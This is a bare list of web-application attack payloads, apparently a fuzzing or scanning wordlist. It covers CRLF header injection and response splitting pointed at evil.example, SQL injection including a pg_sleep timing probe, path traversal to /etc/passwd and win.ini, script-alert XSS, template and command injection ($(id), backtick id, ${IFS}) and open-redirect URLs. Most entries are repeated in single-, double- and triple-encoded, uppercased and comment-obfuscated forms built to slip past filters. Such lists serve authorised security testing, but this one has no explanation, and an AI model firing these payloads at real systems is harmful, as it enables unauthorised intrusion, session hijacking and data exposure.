%0d%0aSet-Cookie:%20injected=1
%0d%0aLocation:%20https://evil.example
%0d%0aX-Test:%20injected
Set-Cookie: injected=1
%0aX-Injected:%201
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%250d%250aSet-Cookie%3A%2520injected%3D1
%250d%250aLocation%3A%2520https%3A%2F%2Fevil.example
%250d%250aX-Test%3A%2520injected
%0D%0ASet-Cookie%3A%20injected%3D1
%250aX-Injected%3A%25201
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
%0D%0ASET-COOKIE:%20INJECTED=1
%0D%0ALOCATION:%20HTTPS://EVIL.EXAMPLE
%0D%0AX-TEST:%20INJECTED
SET-COOKIE: INJECTED=1
%0AX-INJECTED:%201
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%250D%250ASET-COOKIE%3A%2520INJECTED%3D1
%250D%250ALOCATION%3A%2520HTTPS%3A%2F%2FEVIL.EXAMPLE
%250D%250AX-TEST%3A%2520INJECTED
%0D%0ASET-COOKIE%3A%20INJECTED%3D1
%250AX-INJECTED%3A%25201
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
%0d%0aSet-Cookie:%20injected%3D1
Set-Cookie: injected%3D1
' OR '1'%3D'1
" OR "1"%3D"1
%0D%0ASET-COOKIE:%20INJECTED%3D1
SET-COOKIE: INJECTED%3D1
%0d%0aSet-Cookie:%20injected=1?v=0
%0d%0aSet-Cookie:%20injected=1&v=0
%250d%250aSet-Cookie%3A%2520injected%3D1_0
crlf_0
/crlf/0
%0d%0aSet-Cookie:%20injected=1%0a0
%0d%0aLocation:%20https://evil.example?v=1
%0d%0aLocation:%20https://evil.example&v=1
%250d%250aLocation%3A%2520https%3A%2F%2Fevil.example_1
crlf_1
/crlf/1
%0d%0aLocation:%20https://evil.example%0a1
%0d%0aX-Test:%20injected?v=2
%0d%0aX-Test:%20injected&v=2
%250d%250aX-Test%3A%2520injected_2
crlf_2
%0d%0aSet-Cookie: aurose=1
%250d%250aSet-Cookie%3A%20aurose%3D1
%25250d%25250aSet-Cookie%253A%2520aurose%253D1
%0d%0aSet-Cookie:/**/aurose=1
%0d%0aSet-Cookie: aurose%3d1
%0D%0ASET-COOKIE: AUROSE=1
%0d%0aSet-Cookie: aurose=1?aurose=1
%0d%0aSet-Cookie: aurose=1&aurose=1
%0d%0aLocation: https://evil.example
%250d%250aLocation%3A%20https%3A%2F%2Fevil.example
%25250d%25250aLocation%253A%2520https%253A%252F%252Fevil.example
%0d%0aLocation:/**/https://evil.example
%0D%0ALOCATION: HTTPS://EVIL.EXAMPLE
%0d%0aLocation: https://evil.example?aurose=1
%0d%0aLocation: https://evil.example&aurose=1
%0d%0aX-Injected: yes
%250d%250aX-Injected%3A%20yes
%25250d%25250aX-Injected%253A%2520yes
%0d%0aX-Injected:/**/yes
%0D%0AX-INJECTED: YES
%0d%0aX-Injected: yes?aurose=1
%0d%0aX-Injected: yes&aurose=1
%0aX-Test: 1
%250aX-Test%3A%201
%25250aX-Test%253A%25201
%0aX-Test:/**/1
%0AX-TEST: 1
%0aX-Test: 1?aurose=1
%0aX-Test: 1&aurose=1
%0dSet-Cookie: pwn=1
%250dSet-Cookie%3A%20pwn%3D1
%25250dSet-Cookie%253A%2520pwn%253D1
%0dSet-Cookie:/**/pwn=1
%0dSet-Cookie: pwn%3d1
%0DSET-COOKIE: PWN=1
%0dSet-Cookie: pwn=1?aurose=1
%0dSet-Cookie: pwn=1&aurose=1
X-Aurose:1
%0D%0AX-Aurose%3A1
%250D%250AX-Aurose%253A1
X-AUROSE:1
X-Aurose:1?aurose=1
X-Aurose:1&aurose=1
%0d%0aContent-Length:0%0d%0a%0d%0a
%250d%250aContent-Length%3A0%250d%250a%250d%250a
%25250d%25250aContent-Length%253A0%25250d%25250a%25250d%25250a
%0D%0ACONTENT-LENGTH:0%0D%0A%0D%0A
%0d%0aContent-Length:0%0d%0a%0d%0a?aurose=1
%0d%0aContent-Length:0%0d%0a%0d%0a&aurose=1
%0d%0aHost: evil.example
%250d%250aHost%3A%20evil.example
%25250d%25250aHost%253A%2520evil.example
%0d%0aHost:/**/evil.example
%0D%0AHOST: EVIL.EXAMPLE
%0d%0aHost: evil.example?aurose=1
%0d%0aHost: evil.example&aurose=1
%2527%2520OR%2520%25271%2527%253D%25271
'/**/OR/**/'1'='1
' OR '1'%3d'1
' OR '1'='1?aurose=1
' OR '1'='1&aurose=1
%2522%2520OR%2520%25221%2522%253D%25221
"/**/OR/**/"1"="1
" OR "1"%3d"1
" OR "1"="1?aurose=1
" OR "1"="1&aurose=1
' AND 1=1 --
%27%20AND%201%3D1%20--
%2527%2520AND%25201%253D1%2520--
'/**/AND/**/1=1/**/--
' AND 1%3d1 --
' AND 1=1 --?aurose=1
' AND 1=1 --&aurose=1
' AND 1=2 --
%27%20AND%201%3D2%20--
%2527%2520AND%25201%253D2%2520--
'/**/AND/**/1=2/**/--
' AND 1%3d2 --
' AND 1=2 --?aurose=1
' AND 1=2 --&aurose=1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../etc/passwd?aurose=1
../../../../etc/passwd&aurose=1
..%255C..%255C..%255C..%255Cwindows%255Cwin.ini
..\..\..\..\windows\win.ini?aurose=1
..\..\..\..\windows\win.ini&aurose=1
%2524%257B7%252A7%257D
${7*7}?aurose=1
${7*7}&aurose=1
%257B%257B7%252A7%257D%257D
{{7*7}}?aurose=1
{{7*7}}&aurose=1
<script>alert(document.domain)</script>
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E
<SCRIPT>ALERT(DOCUMENT.DOMAIN)</SCRIPT>
<script>alert(document.domain)</script>?aurose=1
<script>alert(document.domain)</script>&aurose=1
';SELECT pg_sleep(2)--
%27%3BSELECT%20pg_sleep%282%29--
%2527%253BSELECT%2520pg_sleep%25282%2529--
';SELECT/**/pg_sleep(2)--
';SELECT PG_SLEEP(2)--
';SELECT pg_sleep(2)--?aurose=1
';SELECT pg_sleep(2)--&aurose=1
%2560id%2560
`id`?aurose=1
`id`&aurose=1
$(id)
%24%28id%29
%2524%2528id%2529
$(ID)
$(id)?aurose=1
$(id)&aurose=1
${IFS}
%24%7BIFS%7D
%2524%257BIFS%257D
${IFS}?aurose=1
${IFS}&aurose=1
%0d%0aX-Aurose: 1
%250d%250aX-Aurose%3A%201
%25250d%25250aX-Aurose%253A%25201
%0d%0aX-Aurose:/**/1
%0D%0AX-AUROSE: 1
%0d%0aX-Aurose: 1?aurose=1
%0d%0aX-Aurose: 1&aurose=1
https://example.com/?next=https://evil.example
https%3A%2F%2Fexample.com%2F%3Fnext%3Dhttps%3A%2F%2Fevil.example
https%253A%252F%252Fexample.com%252F%253Fnext%253Dhttps%253A%252F%252Fevil.example
https://example.com/?next%3dhttps://evil.example
HTTPS://EXAMPLE.COM/?NEXT=HTTPS://EVIL.EXAMPLE
https://example.com/?next=https://evil.example?aurose=1
https://example.com/?next=https://evil.example&aurose=1
%0d%0aSet-Cookie: aurose=1::var0
%250d%250aSet-Cookie%3A%20aurose%3D1::v0
/crlf/probe/0
%0d%0aLocation: https://evil.example::var1
%250d%250aLocation%3A%20https%3A%2F%2Fevil.example::v1
/crlf/probe/1
%0d%0aX-Injected: yes::var2
%250d%250aX-Injected%3A%20yes::v2
/crlf/probe/2
%0aX-Test: 1::var3
%250aX-Test%3A%201::v3
/crlf/probe/3
%0dSet-Cookie: pwn=1::var4
%250dSet-Cookie%3A%20pwn%3D1::v4
/crlf/probe/4
X-Aurose:1::var5
%0D%0AX-Aurose%3A1::v5
/crlf/probe/5
%0d%0aContent-Length:0%0d%0a%0d%0a::var6
%250d%250aContent-Length%3A0%250d%250a%250d%250a::v6
/crlf/probe/6
%0d%0aHost: evil.example::var7
%250d%250aHost%3A%20evil.example::v7
/crlf/probe/7
' OR '1'='1::var8
%27%20OR%20%271%27%3D%271::v8
/crlf/probe/8
